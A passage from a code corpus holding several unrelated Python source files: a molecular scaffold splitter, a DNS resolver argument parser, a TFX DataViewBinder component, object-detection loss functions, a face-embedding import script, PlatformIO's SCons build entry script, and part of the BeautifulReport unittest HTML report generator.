stereo[self.stereos.index(bond.GetStereo())] = 1.
edge_attr = torch.tensor(
[single, double, triple, aromatic, conjugation, ring] + stereo)
edge_attrs += [edge_attr, edge_attr]
if len(edge_attrs) == 0:
data.edge_index = torch.zeros((2, 0), dtype=torch.long)
data.edge_attr = torch.zeros((0, 10), dtype=torch.float)
else:
num_atoms = mol.GetNumAtoms()
feats = torch.stack(edge_attrs, dim=0)
feats = torch.cat([feats, torch.zeros(feats.shape[0], 1)], dim=1)
self_loop_feats = torch.zeros(num_atoms, feats.shape[1])
self_loop_feats[:, -1] = 1
feats = torch.cat([feats, self_loop_feats], dim=0)
data.edge_attr = feats
return data
def gen_scaffold_lda_split(dataset, client_num=5, alpha=0.1):
r"""
return dict{ID:[idxs]}
"""
logger.info('Scaffold split might take minutes, please wait...')
scaffolds = {}
for idx, data in enumerate(dataset):
smiles = data.smiles
mol = Chem.MolFromSmiles(smiles)
scaffold = generate_scaffold(smiles)
if scaffold not in scaffolds:
scaffolds[scaffold] = [idx]
else:
scaffolds[scaffold].append(idx)
# Sort from largest to smallest scaffold sets
scaffolds = {key: sorted(value) for key, value in scaffolds.items()}
scaffold_list = [
list(scaffold_set)
for (scaffold,
scaffold_set) in sorted(scaffolds.items(),
key=lambda x: (len(x[1]), x[1][0]),
reverse=True)
]
label = np.zeros(len(dataset))
for i in range(len(scaffold_list)):
label[scaffold_list[i]] = i+1
label = torch.LongTensor(label)
# Split data to list
idx_slice = dirichlet_distribution_noniid_slice(label, client_num, alpha)
return idx_slice
class ScaffoldLdaSplitter:
r"""First adopt scaffold splitting and then assign the samples to clients according to Latent Dirichlet Allocation.
Arguments:
dataset (List or PyG.dataset): The molecular datasets.
alpha (float): Partition hyperparameter in LDA, smaller alpha generates more extreme heterogeneous scenario.
Returns:
data_list (List(List(PyG.data))): Splited dataset via scaffold split.
"""
def __init__(self, client_num, alpha):
self.client_num = client_num
self.alpha = alpha
def __call__(self, dataset):
featurizer = GenFeatures()
data = []
for ds in dataset:
ds = featurizer(ds)
data.append(ds)
dataset = data
idx_slice = gen_scaffold_lda_split(dataset, self.client_num, self.alpha)
data_list = [[dataset[idx] for idx in idxs] for idxs in idx_slice]
return data_list
def __repr__(self):
return f'{self.__class__.__name__}()'
|
the-stack_106_23293 | """
Contains functions that handles command line parsing logic.
"""
import argparse
def create_parser():
"""
Creates a command line parser.
There are four arguments allowed for this parser:
(1) the dns server ip (required)
(2) the domain name to be resolved (resolved)
(3) a verbose option, to print tracing information (optional)
(4) an ipv6 option, to return the ipv6 address for a domain name (optional)
:return: the command line argument parser
"""
parser = argparse.ArgumentParser(description='Simple DNS Resolver.')
parser.add_argument("dns_server_ip", type=str, nargs=1,
help='Consumes the IP address (IPv4 only) of a DNS Server.')
parser.add_argument("domain_name", type=str, nargs=1,
help='Consumes any valid, registered domain name.')
parser.add_argument("--verbose", type=bool, nargs=1,
help='If enabled, prints a trace of the resolution. (Input any value to set to true.')
parser.add_argument("--ipv6", type=bool, nargs=1,
help='If enabled, retrieves the IPv6 of the domain name. (Input any value to set to true).')
return parser |
the-stack_106_23294 | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TFX DataViewBinder component definition."""
from typing import Optional, Text
from tfx import types
from tfx.components.base import base_component
from tfx.components.base import executor_spec
from tfx.components.experimental.data_view import binder_executor
from tfx.types import artifact_utils
from tfx.types import channel_utils
from tfx.types import standard_artifacts
from tfx.types.component_spec import ChannelParameter
from tfx.types.component_spec import ComponentSpec
class _DataViewBinderComponentSpec(ComponentSpec):
"""ComponentSpec for Custom TFX Hello World Component."""
PARAMETERS = {}
INPUTS = {
'input_examples': ChannelParameter(type=standard_artifacts.Examples),
'data_view': ChannelParameter(type=standard_artifacts.DataView),
}
OUTPUTS = {
'output_examples': ChannelParameter(type=standard_artifacts.Examples),
}
class DataViewBinder(base_component.BaseComponent):
"""A component that binds a DataView to ExamplesArtifact.
It takes as inputs a channel of Examples and a channel of DataView, and
binds the DataView (i.e. attaching information from the DataView as custom
properties) to the Examples in the input channel, producing new Examples
Artifacts that are identical to the input Examples (including the uris),
except for the additional information attached.
Example:
```
# We assume Examples are imported by ExampleGen
example_gen = ...
# First, create a dataview:
data_view_provider = TfGraphDataViewProvider(
module_file=module_file,
create_decoder_func='create_decoder')
# Then, bind the DataView to Examples:
data_view_binder = DataViewBinder(
input_examples=example_gen.outputs['examples'],
data_view=data_view_provider.outputs['data_view'],
)
# Downstream component can then consume the output of the DataViewBinder:
stats_gen = StatisticsGen(
examples=data_view_binder.outputs['output_examples'], ...)
```
"""
SPEC_CLASS = _DataViewBinderComponentSpec
EXECUTOR_SPEC = executor_spec.ExecutorClassSpec(
binder_executor.DataViewBinderExecutor)
def __init__(self,
input_examples: types.Channel,
data_view: types.Channel,
output_examples: Optional[types.Channel] = None,
instance_name: Optional[Text] = None):
if not output_examples:
output_artifact = standard_artifacts.Examples()
output_artifact.copy_from(
artifact_utils.get_single_instance(list(input_examples.get())))
output_examples = channel_utils.as_channel([output_artifact])
spec = _DataViewBinderComponentSpec(
input_examples=input_examples,
data_view=data_view,
output_examples=output_examples)
super().__init__(spec=spec, instance_name=instance_name)
|
the-stack_106_23296 | # Loss functions
import torch
import torch.nn as nn
from ..utils.general import bbox_iou
from ..utils.torch_utils import is_parallel
def smooth_BCE(eps=0.1): # https://github.com/ultralytics/yolov3/issues/238#issuecomment-598028441
# return positive, negative label smoothing BCE targets
return 1.0 - 0.5 * eps, 0.5 * eps
class BCEBlurWithLogitsLoss(nn.Module):
# BCEwithLogitLoss() with reduced missing label effects.
def __init__(self, alpha=0.05):
super(BCEBlurWithLogitsLoss, self).__init__()
self.loss_fcn = nn.BCEWithLogitsLoss(reduction='none') # must be nn.BCEWithLogitsLoss()
self.alpha = alpha
def forward(self, pred, true):
loss = self.loss_fcn(pred, true)
pred = torch.sigmoid(pred) # prob from logits
dx = pred - true # reduce only missing label effects
# dx = (pred - true).abs() # reduce missing label and false label effects
alpha_factor = 1 - torch.exp((dx - 1) / (self.alpha + 1e-4))
loss *= alpha_factor
return loss.mean()
class FocalLoss(nn.Module):
# Wraps focal loss around existing loss_fcn(), i.e. criteria = FocalLoss(nn.BCEWithLogitsLoss(), gamma=1.5)
def __init__(self, loss_fcn, gamma=1.5, alpha=0.25):
super(FocalLoss, self).__init__()
self.loss_fcn = loss_fcn # must be nn.BCEWithLogitsLoss()
self.gamma = gamma
self.alpha = alpha
self.reduction = loss_fcn.reduction
self.loss_fcn.reduction = 'none' # required to apply FL to each element
def forward(self, pred, true):
loss = self.loss_fcn(pred, true)
# p_t = torch.exp(-loss)
# loss *= self.alpha * (1.000001 - p_t) ** self.gamma # non-zero power for gradient stability
# TF implementation https://github.com/tensorflow/addons/blob/v0.7.1/tensorflow_addons/losses/focal_loss.py
pred_prob = torch.sigmoid(pred) # prob from logits
p_t = true * pred_prob + (1 - true) * (1 - pred_prob)
alpha_factor = true * self.alpha + (1 - true) * (1 - self.alpha)
modulating_factor = (1.0 - p_t) ** self.gamma
loss *= alpha_factor * modulating_factor
if self.reduction == 'mean':
return loss.mean()
elif self.reduction == 'sum':
return loss.sum()
else: # 'none'
return loss
class QFocalLoss(nn.Module):
# Wraps Quality focal loss around existing loss_fcn(), i.e. criteria = FocalLoss(nn.BCEWithLogitsLoss(), gamma=1.5)
def __init__(self, loss_fcn, gamma=1.5, alpha=0.25):
super(QFocalLoss, self).__init__()
self.loss_fcn = loss_fcn # must be nn.BCEWithLogitsLoss()
self.gamma = gamma
self.alpha = alpha
self.reduction = loss_fcn.reduction
self.loss_fcn.reduction = 'none' # required to apply FL to each element
def forward(self, pred, true):
loss = self.loss_fcn(pred, true)
pred_prob = torch.sigmoid(pred) # prob from logits
alpha_factor = true * self.alpha + (1 - true) * (1 - self.alpha)
modulating_factor = torch.abs(true - pred_prob) ** self.gamma
loss *= alpha_factor * modulating_factor
if self.reduction == 'mean':
return loss.mean()
elif self.reduction == 'sum':
return loss.sum()
else: # 'none'
return loss
class ComputeLoss:
# Compute losses
def __init__(self, model, autobalance=False):
super(ComputeLoss, self).__init__()
device = next(model.parameters()).device # get model device
h = model.hyp # hyperparameters
# Define criteria
BCEcls = nn.BCEWithLogitsLoss(pos_weight=torch.tensor([h['cls_pw']], device=device))
BCEobj = nn.BCEWithLogitsLoss(pos_weight=torch.tensor([h['obj_pw']], device=device))
# Class label smoothing https://arxiv.org/pdf/1902.04103.pdf eqn 3
self.cp, self.cn = smooth_BCE(eps=h.get('label_smoothing', 0.0)) # positive, negative BCE targets
# Focal loss
g = h['fl_gamma'] # focal loss gamma
if g > 0:
BCEcls, BCEobj = FocalLoss(BCEcls, g), FocalLoss(BCEobj, g)
det = model.module.model[-1] if is_parallel(model) else model.model[-1] # Detect() module
self.balance = {3: [4.0, 1.0, 0.4]}.get(det.nl, [4.0, 1.0, 0.25, 0.06, .02]) # P3-P7
self.ssi = list(det.stride).index(16) if autobalance else 0 # stride 16 index
self.BCEcls, self.BCEobj, self.gr, self.hyp, self.autobalance = BCEcls, BCEobj, model.gr, h, autobalance
for k in 'na', 'nc', 'nl', 'anchors':
setattr(self, k, getattr(det, k))
def __call__(self, p, targets): # predictions, targets, model
device = targets.device
lcls, lbox, lobj = torch.zeros(1, device=device), torch.zeros(1, device=device), torch.zeros(1, device=device)
tcls, tbox, indices, anchors = self.build_targets(p, targets) # targets
# Losses
for i, pi in enumerate(p): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
tobj = torch.zeros_like(pi[..., 0], device=device) # target obj
n = b.shape[0] # number of targets
if n:
ps = pi[b, a, gj, gi] # prediction subset corresponding to targets
# Regression
pxy = ps[:, :2].sigmoid() * 2. - 0.5
pwh = (ps[:, 2:4].sigmoid() * 2) ** 2 * anchors[i]
pbox = torch.cat((pxy, pwh), 1) # predicted box
iou = bbox_iou(pbox.T, tbox[i], x1y1x2y2=False, CIoU=True) # iou(prediction, target)
lbox += (1.0 - iou).mean() # iou loss
# Objectness
tobj[b, a, gj, gi] = (1.0 - self.gr) + self.gr * iou.detach().clamp(0).type(tobj.dtype) # iou ratio
# Classification
if self.nc > 1: # cls loss (only if multiple classes)
t = torch.full_like(ps[:, 5:], self.cn, device=device) # targets
t[range(n), tcls[i]] = self.cp
lcls += self.BCEcls(ps[:, 5:], t) # BCE
# Append targets to text file
# with open('targets.txt', 'a') as file:
# [file.write('%11.5g ' * 4 % tuple(x) + '\n') for x in torch.cat((txy[i], twh[i]), 1)]
obji = self.BCEobj(pi[..., 4], tobj)
lobj += obji * self.balance[i] # obj loss
if self.autobalance:
self.balance[i] = self.balance[i] * 0.9999 + 0.0001 / obji.detach().item()
if self.autobalance:
self.balance = [x / self.balance[self.ssi] for x in self.balance]
lbox *= self.hyp['box']
lobj *= self.hyp['obj']
lcls *= self.hyp['cls']
bs = tobj.shape[0] # batch size
loss = lbox + lobj + lcls
return loss * bs, torch.cat((lbox, lobj, lcls, loss)).detach()
def build_targets(self, p, targets):
# Build targets for compute_loss(), input targets(image,class,x,y,w,h)
na, nt = self.na, targets.shape[0] # number of anchors, targets
tcls, tbox, indices, anch = [], [], [], []
gain = torch.ones(7, device=targets.device) # normalized to gridspace gain
ai = torch.arange(na, device=targets.device).float().view(na, 1).repeat(1, nt) # same as .repeat_interleave(nt)
targets = torch.cat((targets.repeat(na, 1, 1), ai[:, :, None]), 2) # append anchor indices
g = 0.5 # bias
off = torch.tensor([[0, 0],
[1, 0], [0, 1], [-1, 0], [0, -1], # j,k,l,m
# [1, 1], [1, -1], [-1, 1], [-1, -1], # jk,jm,lk,lm
], device=targets.device).float() * g # offsets
for i in range(self.nl):
anchors = self.anchors[i]
gain[2:6] = torch.tensor(p[i].shape)[[3, 2, 3, 2]] # xyxy gain
# Match targets to anchors
t = targets * gain
if nt:
# Matches
r = t[:, :, 4:6] / anchors[:, None] # wh ratio
j = torch.max(r, 1. / r).max(2)[0] < self.hyp['anchor_t'] # compare
# j = wh_iou(anchors, t[:, 4:6]) > model.hyp['iou_t'] # iou(3,n)=wh_iou(anchors(3,2), gwh(n,2))
t = t[j] # filter
# Offsets
gxy = t[:, 2:4] # grid xy
gxi = gain[[2, 3]] - gxy # inverse
j, k = ((gxy % 1. < g) & (gxy > 1.)).T
l, m = ((gxi % 1. < g) & (gxi > 1.)).T
j = torch.stack((torch.ones_like(j), j, k, l, m))
t = t.repeat((5, 1, 1))[j]
offsets = (torch.zeros_like(gxy)[None] + off[:, None])[j]
else:
t = targets[0]
offsets = 0
# Define
b, c = t[:, :2].long().T # image, class
gxy = t[:, 2:4] # grid xy
gwh = t[:, 4:6] # grid wh
gij = (gxy - offsets).long()
gi, gj = gij.T # grid xy indices
# Append
a = t[:, 6].long() # anchor indices
indices.append((b, a, gj.clamp_(0, gain[3] - 1), gi.clamp_(0, gain[2] - 1))) # image, anchor, grid indices
tbox.append(torch.cat((gxy - gij, gwh), 1)) # box
anch.append(anchors[a]) # anchors
tcls.append(c) # class
return tcls, tbox, indices, anch
|
the-stack_106_23298 | # -*- coding: UTF-8 -*-
import os
import numpy as np
from migrate_db import People, db, app
uuid = '28DDU17531000102'
embedding_basedir = '/home/actiontec/PycharmProjects/DeepLearning/FaceRecognition/facenet/src/faces/' \
'ae64c98bdff9b674fb5dad4b/front/face_embedding'
url = ''
style = 'front'
group_id = 'ae64c98bdff9b674fb5dad4b'
def txt2embedding(file_path):
with open(file_path, 'r') as bottleneck_file:
bottleneck_string = bottleneck_file.read()
# print(bottleneck_string)
bottleneck_values = [float(x) for x in bottleneck_string.split(',')]
embedding = np.array(bottleneck_values, dtype='f')
return embedding
if __name__ == '__main__':
with app.app_context():
for root, dirs, files in os.walk(embedding_basedir):
for name in files:
file_path = os.path.join(root, name)
objid = root.split('_')[-1]
embedding = txt2embedding(file_path)
people = People(embed=embedding, uuid=uuid, group_id=group_id,
objId=objid, aliyun_url=url, classId=objid, style=style)
db.session.add(people)
db.session.commit()
|
the-stack_106_23299 | # Copyright (c) 2014-present PlatformIO <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import sys
from time import time
import click
from SCons.Script import ARGUMENTS # pylint: disable=import-error
from SCons.Script import COMMAND_LINE_TARGETS # pylint: disable=import-error
from SCons.Script import DEFAULT_TARGETS # pylint: disable=import-error
from SCons.Script import AllowSubstExceptions # pylint: disable=import-error
from SCons.Script import AlwaysBuild # pylint: disable=import-error
from SCons.Script import Default # pylint: disable=import-error
from SCons.Script import DefaultEnvironment # pylint: disable=import-error
from SCons.Script import Import # pylint: disable=import-error
from SCons.Script import Variables # pylint: disable=import-error
from platformio import compat, fs
from platformio.platform.base import PlatformBase
from platformio.proc import get_pythonexe_path
from platformio.project.helpers import get_project_dir
AllowSubstExceptions(NameError)
# append CLI arguments to build environment
clivars = Variables(None)
clivars.AddVariables(
("PLATFORM_MANIFEST",),
("BUILD_SCRIPT",),
("PROJECT_CONFIG",),
("PIOENV",),
("PIOTEST_RUNNING_NAME",),
("UPLOAD_PORT",),
)
DEFAULT_ENV_OPTIONS = dict(
tools=[
"ar",
"as",
"cc",
"c++",
"link",
"platformio",
"piotarget",
"pioplatform",
"pioproject",
"piomaxlen",
"piolib",
"pioupload",
"piomisc",
"pioide",
"piosize",
],
toolpath=[os.path.join(fs.get_source_dir(), "builder", "tools")],
variables=clivars,
# Propagating External Environment
ENV=os.environ,
UNIX_TIME=int(time()),
BUILD_DIR=os.path.join("$PROJECT_BUILD_DIR", "$PIOENV"),
BUILD_SRC_DIR=os.path.join("$BUILD_DIR", "src"),
BUILD_TEST_DIR=os.path.join("$BUILD_DIR", "test"),
COMPILATIONDB_PATH=os.path.join("$BUILD_DIR", "compile_commands.json"),
LIBPATH=["$BUILD_DIR"],
PROGNAME="program",
PROG_PATH=os.path.join("$BUILD_DIR", "$PROGNAME$PROGSUFFIX"),
PYTHONEXE=get_pythonexe_path(),
IDE_EXTRA_DATA={},
)
# Declare command verbose messages
command_strings = dict(
ARCOM="Archiving",
LINKCOM="Linking",
RANLIBCOM="Indexing",
ASCOM="Compiling",
ASPPCOM="Compiling",
CCCOM="Compiling",
CXXCOM="Compiling",
)
if not int(ARGUMENTS.get("PIOVERBOSE", 0)):
for name, value in command_strings.items():
DEFAULT_ENV_OPTIONS["%sSTR" % name] = "%s $TARGET" % (value)
env = DefaultEnvironment(**DEFAULT_ENV_OPTIONS)
# Load variables from CLI
env.Replace(
**{
key: PlatformBase.decode_scons_arg(env[key])
for key in list(clivars.keys())
if key in env
}
)
# Setup project optional directories
config = env.GetProjectConfig()
env.Replace(
PROJECT_DIR=get_project_dir(),
PROJECT_CORE_DIR=config.get_optional_dir("core"),
PROJECT_PACKAGES_DIR=config.get_optional_dir("packages"),
PROJECT_WORKSPACE_DIR=config.get_optional_dir("workspace"),
PROJECT_LIBDEPS_DIR=config.get_optional_dir("libdeps"),
PROJECT_INCLUDE_DIR=config.get_optional_dir("include"),
PROJECT_SRC_DIR=config.get_optional_dir("src"),
PROJECTSRC_DIR=config.get_optional_dir("src"), # legacy for dev/platform
PROJECT_TEST_DIR=config.get_optional_dir("test"),
PROJECT_DATA_DIR=config.get_optional_dir("data"),
PROJECTDATA_DIR=config.get_optional_dir("data"), # legacy for dev/platform
PROJECT_BUILD_DIR=config.get_optional_dir("build"),
BUILD_CACHE_DIR=config.get_optional_dir("build_cache"),
LIBSOURCE_DIRS=[
config.get_optional_dir("lib"),
os.path.join("$PROJECT_LIBDEPS_DIR", "$PIOENV"),
config.get_optional_dir("globallib"),
],
)
if (
compat.IS_WINDOWS
and sys.version_info >= (3, 8)
and env["PROJECT_DIR"].startswith("\\\\")
):
click.secho(
"There is a known issue with Python 3.8+ and mapped network drives on "
"Windows.\nSee a solution at:\n"
"https://github.com/platformio/platformio-core/issues/3417",
fg="yellow",
)
if env.subst("$BUILD_CACHE_DIR"):
if not os.path.isdir(env.subst("$BUILD_CACHE_DIR")):
os.makedirs(env.subst("$BUILD_CACHE_DIR"))
env.CacheDir("$BUILD_CACHE_DIR")
if int(ARGUMENTS.get("ISATTY", 0)):
# pylint: disable=protected-access
click._compat.isatty = lambda stream: True
if env.GetOption("clean"):
env.PioClean(env.subst("$BUILD_DIR"))
env.Exit(0)
elif not int(ARGUMENTS.get("PIOVERBOSE", 0)):
click.echo("Verbose mode can be enabled via `-v, --verbose` option")
# Dynamically load dependent tools
if "compiledb" in COMMAND_LINE_TARGETS:
env.Tool("compilation_db")
if not os.path.isdir(env.subst("$BUILD_DIR")):
os.makedirs(env.subst("$BUILD_DIR"))
env.LoadProjectOptions()
env.LoadPioPlatform()
env.SConscriptChdir(0)
env.SConsignFile(
os.path.join(
"$BUILD_DIR", ".sconsign%d%d" % (sys.version_info[0], sys.version_info[1])
)
)
for item in env.GetExtraScripts("pre"):
env.SConscript(item, exports="env")
env.SConscript("$BUILD_SCRIPT")
if "UPLOAD_FLAGS" in env:
env.Prepend(UPLOADERFLAGS=["$UPLOAD_FLAGS"])
if env.GetProjectOption("upload_command"):
env.Replace(UPLOADCMD=env.GetProjectOption("upload_command"))
for item in env.GetExtraScripts("post"):
env.SConscript(item, exports="env")
##############################################################################
# Checking program size
if env.get("SIZETOOL") and not (
set(["nobuild", "sizedata"]) & set(COMMAND_LINE_TARGETS)
):
env.Depends(["upload", "program"], "checkprogsize")
# Replace platform's "size" target with our
_new_targets = [t for t in DEFAULT_TARGETS if str(t) != "size"]
Default(None)
Default(_new_targets)
Default("checkprogsize")
if "compiledb" in COMMAND_LINE_TARGETS:
env.Alias("compiledb", env.CompilationDatabase("$COMPILATIONDB_PATH"))
# Print configured protocols
env.AddPreAction(
["upload", "program"],
env.VerboseAction(
lambda source, target, env: env.PrintUploadInfo(),
"Configuring upload protocol...",
),
)
AlwaysBuild(env.Alias("__debug", DEFAULT_TARGETS))
AlwaysBuild(env.Alias("__test", DEFAULT_TARGETS))
##############################################################################
if "envdump" in COMMAND_LINE_TARGETS:
click.echo(env.Dump())
env.Exit(0)
if set(["_idedata", "idedata"]) & set(COMMAND_LINE_TARGETS):
try:
Import("projenv")
except: # pylint: disable=bare-except
projenv = env
data = projenv.DumpIDEData(env)
# dump to file for the further reading by project.helpers.load_project_ide_data
with open(
projenv.subst(os.path.join("$BUILD_DIR", "idedata.json")),
mode="w",
encoding="utf8",
) as fp:
json.dump(data, fp)
click.echo("\n%s\n" % json.dumps(data)) # pylint: disable=undefined-variable
env.Exit(0)
if "sizedata" in COMMAND_LINE_TARGETS:
AlwaysBuild(
env.Alias(
"sizedata",
DEFAULT_TARGETS,
env.VerboseAction(env.DumpSizeData, "Generating memory usage report..."),
)
)
Default("sizedata")
|
the-stack_106_23303 | """
@Version: 1.0
@Project: BeautyReport
@Author: Raymond
@Data: 2017/11/15 下午5:28
@File: __init__.py.py
@License: MIT
"""
import os
import sys
from io import StringIO as StringIO
import time
import json
import unittest
import platform
import base64
from distutils.sysconfig import get_python_lib
import traceback
from functools import wraps
__all__ = ['BeautifulReport']
HTML_IMG_TEMPLATE = """
<a href="data:image/png;base64, {}">
<img src="data:image/png;base64, {}" width="800px" height="500px"/>
</a>
<br></br>
"""
class OutputRedirector(object):
""" Wrapper to redirect stdout or stderr """
def __init__(self, fp):
self.fp = fp
def write(self, s):
self.fp.write(s)
def writelines(self, lines):
self.fp.writelines(lines)
def flush(self):
self.fp.flush()
stdout_redirector = OutputRedirector(sys.stdout)
stderr_redirector = OutputRedirector(sys.stderr)
SYSSTR = platform.system()
SITE_PAKAGE_PATH = get_python_lib()
FIELDS = {
"testPass": 0,
"testResult": [
],
"testName": "",
"testAll": 0,
"testFail": 0,
"beginTime": "",
"totalTime": "",
"testSkip": 0
}
class PATH:
""" all file PATH meta """
config_tmp_path = SITE_PAKAGE_PATH + '/BeautifulReport/template/template'
class MakeResultJson:
""" make html table tags """
def __init__(self, datas: tuple):
"""
init self object
:param datas: 拿到所有返回数据结构
"""
self.datas = datas
self.result_schema = {}
def __setitem__(self, key, value):
"""
:param key: self[key]
:param value: value
:return:
"""
self[key] = value
def __repr__(self) -> str:
"""
返回对象的html结构体
:rtype: dict
:return: self的repr对象, 返回一个构造完成的tr表单
"""
keys = (
'className',
'methodName',
'description',
'spendTime',
'status',
'log',
)
for key, data in zip(keys, self.datas):
self.result_schema.setdefault(key, data)
return json.dumps(self.result_schema)
class ReportTestResult(unittest.TestResult):
""" override"""
def __init__(self, suite, stream=sys.stdout):
""" pass """
super(ReportTestResult, self).__init__()
self.begin_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
self.start_time = 0
self.stream = stream
self.end_time = 0
self.failure_count = 0
self.error_count = 0
self.success_count = 0
self.skipped = 0
self.verbosity = 1
self.success_case_info = []
self.skipped_case_info = []
self.failures_case_info = []
self.errors_case_info = []
self.all_case_counter = 0
self.suite = suite
self.status = ''
self.result_list = []
self.case_log = ''
self.default_report_name = 'Automated test report'
self.FIELDS = None
self.sys_stdout = None
self.sys_stderr = None
self.outputBuffer = None
@property
def success_counter(self) -> int:
""" set success counter """
return self.success_count
@success_counter.setter
def success_counter(self, value) -> None:
"""
success_counter函数的setter方法, 用于改变成功的case数量
:param value: 当前传递进来的成功次数的int数值
:return:
"""
self.success_count = value
def startTest(self, test) -> None:
"""
当测试用例测试即将运行时调用
:return:
"""
unittest.TestResult.startTest(self, test)
self.outputBuffer = StringIO()
stdout_redirector.fp = self.outputBuffer
stderr_redirector.fp = self.outputBuffer
self.sys_stdout = sys.stdout
self.sys_stdout = sys.stderr
sys.stdout = stdout_redirector
sys.stderr = stderr_redirector
self.start_time = time.time()
def stopTest(self, test) -> None:
"""
当测试用力执行完成后进行调用
:return:
"""
self.end_time = '{0:.3} s'.format((time.time() - self.start_time))
self.result_list.append(self.get_all_result_info_tuple(test))
self.complete_output()
def complete_output(self):
"""
Disconnect output redirection and return buffer.
Safe to call multiple times.
"""
if self.sys_stdout:
sys.stdout = self.sys_stdout
sys.stderr = self.sys_stdout
self.sys_stdout = None
self.sys_stdout = None
return self.outputBuffer.getvalue()
def stopTestRun(self, title=None) -> dict:
"""
所有测试执行完成后, 执行该方法
:param title:
:return:
"""
FIELDS['testPass'] = self.success_counter
for item in self.result_list:
item = json.loads(str(MakeResultJson(item)))
FIELDS.get('testResult').append(item)
FIELDS['testAll'] = len(self.result_list)
FIELDS['testName'] = title if title else self.default_report_name
FIELDS['testFail'] = self.failure_count
FIELDS['beginTime'] = self.begin_time
end_time = int(time.time())
start_time = int(time.mktime(time.strptime(self.begin_time, '%Y-%m-%d %H:%M:%S')))
FIELDS['totalTime'] = str(end_time - start_time) + 's'
FIELDS['testError'] = self.error_count
FIELDS['testSkip'] = self.skipped
self.FIELDS = FIELDS
return FIELDS
def get_all_result_info_tuple(self, test) -> tuple:
"""
接受test 相关信息, 并拼接成一个完成的tuple结构返回
:param test:
:return:
"""
return tuple([*self.get_testcase_property(test), self.end_time, self.status, self.case_log])
@staticmethod
def error_or_failure_text(err) -> str:
"""
获取sys.exc_info()的参数并返回字符串类型的数据, 去掉t6 error
:param err:
:return:
"""
return traceback.format_exception(*err)
def addSuccess(self, test) -> None:
"""
pass
:param test:
:return:
"""
logs = []
output = self.complete_output()
logs.append(output)
if self.verbosity > 1:
sys.stderr.write('ok ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('.')
self.success_counter += 1
self.status = 'Success'
self.case_log = output.split('\n')
self._mirrorOutput = True # print(class_name, method_name, method_doc)
def addError(self, test, err):
"""
add Some Error Result and infos
:param test:
:param err:
:return:
"""
logs = []
output = self.complete_output()
logs.append(output)
logs.extend(self.error_or_failure_text(err))
self.failure_count += 1
self.add_test_type('Fail', logs)
if self.verbosity > 1:
sys.stderr.write('F ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('F')
self._mirrorOutput = True
def addFailure(self, test, err):
"""
add Some Failures Result and infos
:param test:
:param err:
:return:
"""
logs = []
output = self.complete_output()
logs.append(output)
logs.extend(self.error_or_failure_text(err))
self.failure_count += 1
self.add_test_type('Fail', logs)
if self.verbosity > 1:
sys.stderr.write('F ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('F')
self._mirrorOutput = True
def addSkip(self, test, reason) -> None:
"""
获取全部的跳过的case信息
:param test:
:param reason:
:return: None
"""
logs = [reason]
self.complete_output()
self.skipped += 1
self.add_test_type('Skipped', logs)
if self.verbosity > 1:
sys.stderr.write('S ')
sys.stderr.write(str(test))
sys.stderr.write('\n')
else:
sys.stderr.write('S')
self._mirrorOutput = True
def add_test_type(self, status: str, case_log: list) -> None:
"""
abstruct add test type and return tuple
:param status:
:param case_log:
:return:
"""
self.status = status
self.case_log = case_log
@staticmethod
def get_testcase_property(test) -> tuple:
"""
接受一个test, 并返回一个test的class_name, method_name, method_doc属性
:param test:
:return: (class_name, method_name, method_doc) -> tuple
"""
class_name = test.__class__.__qualname__
method_name = test.__dict__['_testMethodName']
method_doc = test.__dict__['_testMethodDoc']
return class_name, method_name, method_doc
class BeautifulReport(ReportTestResult, PATH):
img_path = 'img/' if platform.system() != 'Windows' else 'img\\'
def __init__(self, suites):
super(BeautifulReport, self).__init__(suites)
self.suites = suites
self.log_path = None
self.title = 'Automated test report'
self.filename = 'report.html'
def report(self, description, filename: str = None, log_path='.'):
"""
生成测试报告,并放在当前运行路径下
:param log_path: 生成report的文件存储路径
:param filename: 生成文件的filename
:param description: 生成文件的注释
:return:
"""
if filename:
self.filename = filename if filename.endswith('.html') else filename + '.html'
if description:
self.title = description
self.log_path = os.path.abspath(log_path)
self.suites.run(result=self)
self.stopTestRun(self.title)
self.output_report()
text = '\nAll test ran, please check the report in {}'.format(self.log_path)
print(text)
def output_report(self):
"""
生成测试报告到指定路径下
:return:
"""
template_path = self.config_tmp_path
override_path = os.path.abspath(self.log_path) if \
os.path.abspath(self.log_path).endswith('/') else \
os.path.abspath(self.log_path) + '/'
with open(template_path, 'rb') as file:
body = file.readlines()
with open(override_path + self.filename, 'wb') as write_file:
for item in body:
if item.strip().startswith(b'var resultData'):
head = ' var resultData = '
item = item.decode().split(head)
item[1] = head + json.dumps(self.FIELDS, ensure_ascii=False, indent=4)
item = ''.join(item).encode()
item = bytes(item) + b';\n'
write_file.write(item)
@staticmethod
def img2base(img_path: str, file_name: str) -> str:
"""
接受传递进函数的filename 并找到文件转换为base64格式
:param img_path: 通过文件名及默认路径找到的img绝对路径
:param file_name: 用户在装饰器中传递进来的问价匿名
:return:
"""
pattern = '/' if platform != 'Windows' else '\\'
with open(img_path + pattern + file_name, 'rb') as file:
data = file.read()
return base64.b64encode(data).decode()
def add_test_img(*pargs):
"""
接受若干个图片元素, 并展示在测试报告中
:param pargs:
:return:
"""
def _wrap(func):
@wraps(func)
def __wrap(*args, **kwargs):
img_path = os.path.abspath('{}'.format(BeautifulReport.img_path))
try:
result = func(*args, **kwargs)
except Exception:
if 'save_img' in dir(args[0]):
save_img = getattr(args[0], 'save_img')
save_img(func.__name__)
